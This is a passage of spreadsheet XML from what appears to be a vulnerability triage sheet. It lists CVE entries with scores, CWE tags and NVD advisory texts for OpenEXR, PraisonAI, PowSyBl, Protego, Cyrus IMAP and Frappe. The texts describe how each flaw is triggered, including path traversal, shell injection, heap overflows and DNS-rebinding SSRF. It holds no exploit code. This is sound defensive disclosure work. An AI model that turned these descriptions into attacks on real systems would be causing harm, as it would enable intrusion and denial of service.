      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>Protego is a pure-Python robots.txt parser with support for modern conventions. Prior to 0.6.2, protego._urlpattern._URLPattern._prepare_pattern_for_regex translates every asterisk in an Allow or Disallow directive into a lazy regular-expression wildcard, so a directive containing many asterisks creates exponential backtracking. After protego.Protego.parse processes a crafted robots.txt file, protego.Protego.can_fetch can spend an attacker-controlled period matching a near-miss URL and deny service to the crawler. The vulnerable path is src/protego/_urlpattern.py in the _URLPattern match logic. This issue is fixed in version 0.6.2.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55520</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55527</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the FileMemory constructor joins unsanitized user_id into self.user_path. A caller supplying ../ or path separators can escape the memory directory and write JSON data to arbitrary process-writable locations. The fix sanitizes user_id before constructing self.user_path. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55527</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55537</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-705, CWE-918</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, JobSubmitRequest.validate_webhook_url() accepts webhook_url when resolution raises socket.gaierror because the exception path uses except socket.gaierror: pass. JobExecutor._send_webhook() later performs a fresh lookup, allowing DNS changes to direct the request to an internal service. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55537</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55540</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, is_path_within_directory() uses os.path.abspath() rather than os.path.realpath() for the workspace boundary. A symlink inside workspace can point outside and still pass the check, allowing read_file and other code tools to access files outside the configured workspace. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55540</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55609</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>sublinear-time-solver is a Rust and WebAssembly library for solving asymmetric diagonally dominant systems in sublinear time. Prior to consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0, the export_state and import_state tools in src/consciousness-explorer/mcp/server.js pass the attacker-controlled filepath parameter to filesystem operations in src/consciousness-explorer/index.js without restricting the destination or rejecting traversal. The saveVectorToFile and loadVectorFromFile tools in src/mcp/server.ts contain the same sink class through the file_path parameter. An attacker able to invoke the MCP tools can read, write, or overwrite any file accessible to the server process, causing confidentiality and integrity loss and possible service disruption. This issue is fixed in consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0.</t>
        </is>
      </c>
      <c r="S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55609</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55673</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to 7.2.2, UnixLocalCommandExecutor and WindowsLocalCommandExecutor concatenate command arguments and environment variables into strings interpreted through bash -c or cmd /c without sufficient escaping. Attacker-controlled values reaching UnixLocalCommandExecutor.execute, WindowsLocalCommandExecutor.execute, LocalComputationManager.execute, ParallelLoadFlowActionSimulator.run, ActionSimulatorTool.run, AmplModelRunner.run, or AmplModelRunner.runAsync can break out of the intended command and execute arbitrary shell commands as the JVM user. The affected itools paths include action-simulator with task-count, security-analysis with external, and dynamic-security-analysis. Downstream CLI tools, libraries, REST front ends, and multi-tenant grid-analysis services that forward less-trusted contingency identifiers or computation parameters into these APIs can expose the injection remotely. This issue is fixed in version 7.2.2.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55673</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59184</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-787</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 allow a crafted EXR with a nonzero dataWindow.min to make TypedFlatImageChannel::row() return an invalid heap pointer, causing out-of-bounds or use-after-free writes. This occurs when an application writes rows through FlatHalfChannel::row(). Affected consumers are tools, converters, render pipeline components, or image-processing services that accept untrusted EXR files and use FlatHalfChannel::row() on loaded images. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59184</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59186</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, a crafted tiled EXR can trigger a heap out-of-bounds write on 32-bit/ILP32 builds when read through the public TiledRgbaInputFile RGBA API. The file uses a small 40x40 dataWindow but a 65537x65537 tile size. On ILP32, the Array2D&lt;Rgba&gt; tile-conversion buffer size calculation overflows, allocates a much smaller heap buffer, and tile decode writes past that allocation. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59186</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59187</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 are vulnerable to a heap out-of-bounds write when exrmetrics reads a crafted deep scanline EXR. This occurs with pixel conversion options such as --pixelmode float or --bench because DeepSlice requests FLOAT output while the backing sample buffers are allocated using the input HALF element size. The issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59187</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59189</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In OpenEXRUtil versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.12, the documented TypedDeepImageChannel&lt;T&gt;::row() API can return an out-of-bounds pointer when a deep image has a non-zero dataWindow origin, resulting in a heap out-of-bounds read and crash, with potential information disclosure under a controlled heap layout. The flaw arises because ImfDeepImageChannel uses two conflicting coordinate models: at(x, y) uses absolute coordinates (with _base offset by dataWindow.min), while row(r) is documented as 0-based logical access. For a non-zero dataWindow.min, row(0) therefore points outside the _sampleListPointers allocation instead of at the first logical row. This issue is fixed in versions 3.3.13 and 3.4.13.</t>
        </is>
      </c>
      <c r="S608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59189</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59981</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, the OpenEXRUtil library returns an out-of-bounds pointer from the SampleCountChannel::row() API when a deep image has a non-zero dataWindow origin. The row() accessor is documented as 0-based and computes its address from an internal base that is offset for absolute pixel coordinates, so the two coordinate models conflict whenever dataWindow.min is non-zero. For a deep image whose data window has a large negative vertical origin, row(0) points far outside the allocated sample-count buffer. An application that opens an attacker-controlled deep EXR file and accesses sample counts through row() performs an out-of-bounds read, which can crash the process or, under a controlled heap layout, return adjacent heap memory as sample-count values. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59981</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59982</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 can return an out-of-bounds pointer from TypedDeepImageChannel::row() when a crafted deep EXR has a nonzero dataWindow origin. This vulnerability occurs because the API combines zero-based row access with an absolute-coordinate-adjusted base pointer, allowing a crash or limited information disclosure. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59982</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61915</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a VPATCH BYPARAM double-free. An authenticated calendar user could crash a Cyrus CalDAV worker with a PATCH containing PATCH-ACTION="BYPARAM@..." against a resource with two or more properties of the matched kind. The memory holding the selector would be freed once on each iteration over the properties.</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61915</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66003</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework written in Python and JavaScript. Prior to version 15.115.0, an access control bypass in the REST API allows a user to read data from Linked DocTypes that they are not authorized to access. When a document references another document through a Link field, the framework does not consistently enforce the linked DocType's own permissions when the record is retrieved through the REST API, so a low-privileged authenticated user can obtain fields from linked records outside their permitted scope. This issue is fixed in version 15.115.0.</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66003</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68513</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 contain a heap buffer overflow in PyOpenEXR triggered by a channel-name key collision between literal and prefixed RGB channels. When separate_channels=false, PyOpenEXR maps each physical channel name through channelNameToRGBA() and coalesces the results into a shared RGB array. A crafted flat scanline EXR that contains both a literal channel such as left and prefixed channels such as left.R, left.G, and left.B causes these names to collide, so the wrapper reuses an undersized two-dimensional NumPy array for the coalesced RGB slices and writes out of bounds when OpenEXR.File(path) decodes the pixels. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68513</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68515</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
